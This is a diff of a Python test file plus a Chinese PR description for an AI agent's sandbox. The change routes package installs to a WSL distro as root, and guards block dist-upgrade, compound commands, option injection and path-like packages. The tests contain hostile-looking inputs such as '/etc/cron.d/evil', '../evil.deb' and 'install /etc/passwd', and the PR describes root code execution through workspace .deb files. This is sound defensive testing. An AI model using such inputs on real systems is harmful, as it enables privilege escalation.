+async def test_guard_refuses_dist_upgrade_family(command):
+    """dist-upgrade/full-upgrade remove packages and rewrite the whole
+    distro as root — refused with a specific message, never routed."""
+    sandbox = FakeSandbox()
+    manager = FakeSandboxManager(allow_system_installs=True, sandbox=sandbox)
+    tool = ExecTool(working_dir=".", sandbox_manager=manager)
+
+    result = await tool._maybe_route_system_install(
+        command,
+        sandbox_selection=_make_selection(),
+        session_key="k",
+    )
+    assert result is not None
+    assert result.exit_code == 1
+    assert "dist-upgrade/full-upgrade" in result.output
+    assert sandbox.install_calls == []  # never ran as root
+
+
+async def test_guard_keeps_upgrade_routable():
+    """Plain upgrade (no removals, no kernel swaps) stays in the family."""
+    sandbox = FakeSandbox()
+    manager = FakeSandboxManager(allow_system_installs=True, sandbox=sandbox)
+    tool = ExecTool(working_dir=".", sandbox_manager=manager)
+
+    result = await tool._maybe_route_system_install(
+        "sudo apt-get upgrade -y",
+        sandbox_selection=_make_selection(),
+        session_key="k",
+    )
+    assert result is not None
+    assert result.exit_code == 0
+    assert sandbox.install_calls[0][0] == "apt-get upgrade -y"
+
+
+# ── review N2: no sandbox → clear intercept, not cmd degradation ────────
+
+
+async def test_intercept_when_sandbox_unavailable():
+    """get_or_create returns None (sandbox startup failed) — the install
+    must be intercepted with a clear message, not fall through to the
+    normal path's Windows-cmd degradation ("sudo is not recognized")."""
+    manager = FakeSandboxManager(  # sandbox=None: nothing resolves
+        allow_system_installs=True,
+        sandbox=None,
+    )
+    tool = ExecTool(working_dir=".", sandbox_manager=manager)
+
+    result = await tool._maybe_route_system_install(
+        "sudo apt-get install -y texlive-xetex",
+        sandbox_selection=_make_selection(),
+        session_key="k",
+    )
+    assert result is not None
+    assert result.exit_code == 1
+    assert "没有可用的 bwrap 沙箱" in result.output
+    assert "安装命令未执行" in result.output
+
+
+# ── review O1/O2: decision-chain order fixes ────────────────────────────
+
+
+async def test_intercept_when_disabled_without_sandbox():
+    """allow off + no sandbox → the NOT_ENABLED message wins (points at the
+    real fix), no sandbox is created for the doomed command, and no
+    approval is prompted (review #759 O1)."""
+    manager = FakeSandboxManager(
+        allow_system_installs=False,
+        sandbox=None,
+    )
+    tool = ExecTool(
+        working_dir=".",
+        sandbox_manager=manager,
+        approval_callback=lambda *a, **k: "once",
+    )
+
+    result = await tool._maybe_route_system_install(
+        "sudo apt-get install -y texlive-xetex",
+        sandbox_selection=_make_selection(),
+        session_key="k",
+    )
+    assert result is not None
+    assert result.exit_code == 1
+    assert "allow_system_installs" in result.output  # NOT_ENABLED, not NO_SANDBOX
+    assert "没有可用的 bwrap 沙箱" not in result.output
+    assert manager.get_or_create_calls == 0  # no sandbox side-effect
+
+
+async def test_not_routed_when_sandbox_manager_disabled():
+    """enabled=False (user chose direct host exec) → routing never
+    participates, not even to intercept (review #759 O2)."""
+    manager = FakeSandboxManager(
+        allow_system_installs=True,
+        enabled=False,
+        sandbox=FakeSandbox(),
+    )
+    tool = ExecTool(working_dir=".", sandbox_manager=manager)
+
+    result = await tool._maybe_route_system_install(
+        "sudo apt-get install -y texlive-xetex",
+        sandbox_selection=_make_selection(),
+        session_key="k",
+    )
+    assert result is None
+    assert manager.get_or_create_calls == 0
+
+
+# ── review N5: absolute-path package tokens refused ─────────────────────
+
+
+@pytest.mark.parametrize(
+    "command",
+    [
+        "apt-get install /etc/passwd",
+        "sudo apt-get install -y /etc/cron.d/evil",
+    ],
+)
+async def test_guard_refuses_absolute_path_package_tokens(command):
+    """An absolute path is not a package spec — routing it would execute a
+    doomed command as root and trip the desktop approval system's /etc/
+    patterns for nothing."""
+    sandbox = FakeSandbox()
+    manager = FakeSandboxManager(allow_system_installs=True, sandbox=sandbox)
+    tool = ExecTool(working_dir=".", sandbox_manager=manager)
+
+    result = await tool._maybe_route_system_install(
+        command,
+        sandbox_selection=_make_selection(),
+        session_key="k",
+    )
+    assert result is not None
+    assert result.exit_code == 1
+    assert sandbox.install_calls == []  # never ran as root
+
+
+async def test_guard_refuses_relative_path_package_tokens():
+    """Path-like tokens are refused outright (review #759 P1): a relative
+    .deb would make the distro's ROOT apt execute maintainer scripts from
+    a workspace file the agent wrote — arbitrary root code execution, the
+    same channel as -o/-c option injection."""
+    sandbox = FakeSandbox()
+    manager = FakeSandboxManager(allow_system_installs=True, sandbox=sandbox)
+    tool = ExecTool(working_dir=".", sandbox_manager=manager)
+
+    for command in [
+        "sudo apt-get install ./local.deb",
+        "sudo apt-get install ../evil.deb",
+        "sudo apt-get install ~/evil.deb",
+        "sudo apt-get install ~evil.deb",
+        "sudo apt-get install /tmp/evil.deb",
+    ]:
+        result = await tool._maybe_route_system_install(
+            command,
+            sandbox_selection=_make_selection(),
+            session_key="k",
+        )
+        assert result is not None, command
+        assert result.exit_code == 1, command
+        assert sandbox.install_calls == [], command  # never ran as root
+
+
+async def test_version_pin_with_tilde_still_routable():
+    """"~" survives only after "=" — pkg=1.0~rc1 is a version pin, not a
+    path (review #759 P1)."""
+    sandbox = FakeSandbox()
+    manager = FakeSandboxManager(allow_system_installs=True, sandbox=sandbox)
+    tool = ExecTool(working_dir=".", sandbox_manager=manager)
+
+    result = await tool._maybe_route_system_install(
+        "sudo apt-get install pkg=1.0~rc1",
+        sandbox_selection=_make_selection(),
+        session_key="k",
+    )
+    assert result is not None
+    assert result.exit_code == 0
+    assert sandbox.install_calls[0][0] == "apt-get install -y pkg=1.0~rc1"
+
+
+# ── review N6: end-to-end normalize → inject chain ──────────────────────
+
+
+async def test_route_system_install_end_to_end_normalized_command():
+    """The full chain (strip prefix → normalize flags/packages → inject
+    non-interactive flag) must yield exactly the command the distro runs —
+    one assertion covering the whole pipeline, not just fragments."""
+    sandbox = FakeSandbox()
+    manager = FakeSandboxManager(allow_system_installs=True, sandbox=sandbox)
+    tool = ExecTool(working_dir=".", sandbox_manager=manager)
+
+    result = await tool._maybe_route_system_install(
+        "yes | sudo -n apt-get install --no-install-recommends "
+        "texlive-xetex texlive-latex-extra",
+        sandbox_selection=_make_selection(),
+        session_key="k",
+    )
+    assert result is not None
+    assert result.exit_code == 0
+    # yes|/sudo/-n stripped, safe flag preserved, -y injected after the verb
+    assert (
+        sandbox.install_calls[0][0]
+        == "apt-get install -y --no-install-recommends "
+        "texlive-xetex texlive-latex-extra"
+    )
+
+
+def test_describe_exec_environment_install_guidance_disabled():
+    from miqi.sandbox.manager import describe_exec_environment
+
+    manager = FakeSandboxManager(
+        allow_system_installs=False,
+        enabled=True,
+        initialized=True,
+    )
+    text = describe_exec_environment(manager)
+    assert "allow_system_installs" in text
+    assert "系统包安装已开启" not in text
+
+
+# ── BwrapSandbox distro-root execution ─────────────────────────────────
+
+
+def _make_sandbox():
+    from miqi.sandbox.bwrap import BwrapSandbox
+
+    sandbox = BwrapSandbox("k", "/tmp/ws", wsl_distro="Ubuntu")
+    sandbox._use_wsl = True
+    sandbox._detected_distro = "Ubuntu"
+    return sandbox
+
+
+def test_supports_system_installs():
+    from miqi.sandbox.bwrap import BwrapSandbox
+
+    native = BwrapSandbox("k", "/tmp/ws")
+    assert native.supports_system_installs is False
+
+    wsl = _make_sandbox()
+    assert wsl.supports_system_installs is True
+    assert wsl.distro_name == "Ubuntu"
+
+
+async def test_run_in_distro_root_wsl(monkeypatch):
+    sandbox = _make_sandbox()
+    captured = {}
+
+    async def fake_run(cmd, timeout=30.0, as_root=False):
+        captured["cmd"] = cmd
+        captured["timeout"] = timeout
+        captured["as_root"] = as_root
+        return (0, "ok", "")
+
+    monkeypatch.setattr(sandbox, "_run_linux_command", fake_run)
+    rc, out, err = await sandbox.run_in_distro_root("apt-get install -y x")
+    assert rc == 0
+    assert captured["cmd"] == "export DEBIAN_FRONTEND=noninteractive; apt-get install -y x"
+    assert captured["as_root"] is True
+    assert captured["timeout"] == 1200.0
+
+
+async def test_run_in_distro_root_native_returns_error():
+    from miqi.sandbox.bwrap import BwrapSandbox
+
+    sandbox = BwrapSandbox("k", "/tmp/ws")  # native: _use_wsl False
+    rc, out, err = await sandbox.run_in_distro_root("apt-get install x")
+    assert rc == -1
+    assert "WSL" in err
+
+
+async def test_run_linux_command_as_root_builds_wsl_args(monkeypatch):
+    """-u root must be injected into the wsl.exe invocation."""
+    sandbox = _make_sandbox()
+    captured = {}
+
+    async def fake_exec(*args, **kwargs):
+        captured["args"] = args
+
+        class P:
+            returncode = 0
+
+            async def communicate(self):
+                return (b"out", b"")
+
+        return P()
+
+    monkeypatch.setattr("miqi.sandbox.bwrap._create_subprocess_exec", fake_exec)
+    rc, out, err = await sandbox._run_linux_command("echo hi", as_root=True)
+    assert rc == 0
+    assert list(captured["args"][:6]) == ["wsl.exe", "-d", "Ubuntu", "-u", "root", "--"]
+
+
+# ── config ─────────────────────────────────────────────────────────────
+
+
+def test_sandbox_config_new_field():
+    from miqi.config.schema import SandboxConfig
+
+    cfg = SandboxConfig()
+    assert cfg.allow_system_installs is False
+    cfg2 = SandboxConfig(allow_system_installs=True)
+    assert cfg2.allow_system_installs is True


### PR DESCRIPTION
## 类型

- [x] 🐛 Bug 修复

## 变更概述

沙箱内无 root 且系统目录只读，`sudo apt-get install` 永远失败，重型工具链（LaTeX/xelatex、编译器等）无法安装，skill 的 PDF 交付路径不可用；本 PR 将系统包安装命令路由到 WSL 发行版以 root 执行，安装一次跨会话持久。

## 背景/问题

Issue #759：沙箱无法安装/运行重型工具链（如 LaTeX），skill 的 PDF 交付路径不可用。

根因：bwrap 沙箱以 uid 1000 无特权运行，且 `/usr`、`/lib`、`/etc` 等系统目录为只读 ro-bind——`apt-get install` 在沙箱内**永远**无法成功（既无写权限也无 root），此前引导 agent 直接安装只会反复失败。

方案：沙箱对系统目录的 ro-bind 来源于 WSL 发行版，**发行版本身就是持久的 root 层**——在发行版里以 root 安装一次，装完立即通过 ro-bind 在所有沙箱会话可见。因此把安装类命令路由为 `wsl.exe -d <distro> -u root -- bash -c "..."` 执行。

## 关联 issue

- Closes #759 沙箱无法安装/运行重型工具链（如 LaTeX），skill 的 PDF 交付路径不可用

## 变更内容

- **`miqi/agent/tools/shell.py`**（核心）：`ExecTool` 新增系统安装路由链 `_maybe_route_system_install` —— 仅在沙箱启用且 `tools.sandbox.allow_system_installs` 开启时，对安装类命令（apt-get/apt/dnf/yum/zypper/apk/pacman 的 install/update/upgrade/reinstall/add 家族）先走桌面端危险命令审批，再路由到 WSL 发行版以 root 执行（`run_in_distro_root`，20 分钟超时）。安全护栏（`_guard_system_install_command`）：
  - 只接受**单一安装命令**：拒绝复合命令（`&&`/`;`/`|`/重定向）、拒绝包管理器自定义选项（apt `-o`/`-c`、dnf `--config`/`--installroot`、pacman `--config`/`--hookdir`、zypper `--root` 等——root 下 option 值可以是路径，等于任意文件以 root 执行）；
  - 拒绝**任何路径形态的包名**（`./x.deb`、`../x`、`~/x`、`/tmp/x`——沙箱内 agent 自产文件不能以 root 执行）；
  - 拒绝 `dist-upgrade`/`full-upgrade`（会以 root 移除/替换系统包，爆炸半径超出"装工具链"）；
  - 自动注入 `-y`/`--non-interactive`/`--noconfirm`（按包管理器）；
  - 沙箱被显式禁用或未开启 `allow_system_installs` 时给出可操作的中文拦截提示（说明如何开启），不创建沙箱、无副作用。
- **`miqi/sandbox/bwrap.py`**：`run_in_distro_root()` 以 root 执行命令，用模块级 `threading.Lock` 串行化（并发安装互不干扰，跨线程安全）；`supports_system_installs` 仅 Windows+WSL 为真。
- **`miqi/sandbox/manager.py`**：`SandboxManager` 新增 `allow_system_installs` 参数；`describe_exec_environment` 按开关状态向 AI 说明真实的工具链获取方式（避免误导 agent 在沙箱内硬装）。
- **`miqi/config/schema.py`**：`SandboxConfig.allow_system_installs: bool = False`（默认关闭——在 WSL 发行版执行 root 命令属主动让渡的权限，需用户显式开启）。
- **`miqi/bridge/loop.py` / `miqi/bridge/server.py`**：透传配置。
- **`docs/developer-guide.md`**：配置字段说明 + "重型工具链（LaTeX 等）安装"章节。
- **`tests/sandbox/test_system_install_routing.py`**：84 个测试覆盖分类、flag 注入、护栏拦截（复合命令/选项注入/路径包名/dist-upgrade）、路由决策、审批接线、禁用分支、端到端归一化命令断言、describe 输出。

## 日志/验证证据

```
# 单元测试（rebase 到 develop #817 之后）
$ uv run pytest tests/sandbox/test_system_install_routing.py -q
84 passed in 0.79s

$ uv run pytest tests/ -q      # 全量
3131 passed, 20 skipped in 424.07s

$ uv run ruff check miqi/agent/tools/shell.py miqi/sandbox/bwrap.py \
    miqi/sandbox/manager.py tests/sandbox/test_system_install_routing.py
All checks passed!

# 真实 WSL 端到端矩阵（本机 Windows + WSL）
allow_system_installs=true:
  sudo apt-get install -y hello           → routed, 已以 root 在 WSL 发行版中执行（非沙箱内）
  apt-get install --print-uris hello      → routed
  apt-get install x=1.0~rc1               → routed（版本 pin 合法）
  apt-get dist-upgrade -y                 → 拦截：安全护栏（移除/替换系统包）
  apt-get install ./x.deb | ../x | ~/x    → 拦截：路径形态包名
  sudo cat /etc/passwd                    → 不路由，沙箱内正常执行
allow_system_installs=false（默认）:
  sudo apt-get install -y hello           → 拦截：提示开启 allow_system_installs，零沙箱副作用
```

## 测试情况

- 84 个路由单测全部通过（分类/注入/护栏/决策/审批/禁用分支/端到端）
- 全量 3131 passed, 20 skipped（rebase 到最新 develop #817 后）
- 变更文件 ruff 全部通过（上游既有 378 个 ruff 错误与本 PR 无关，未新增）
- 真实 Windows+WSL 端到端矩阵验证通过（上表）

## 截图

无需截图（纯后端行为变更，无 UI 变更）

## 后续计划

- 无
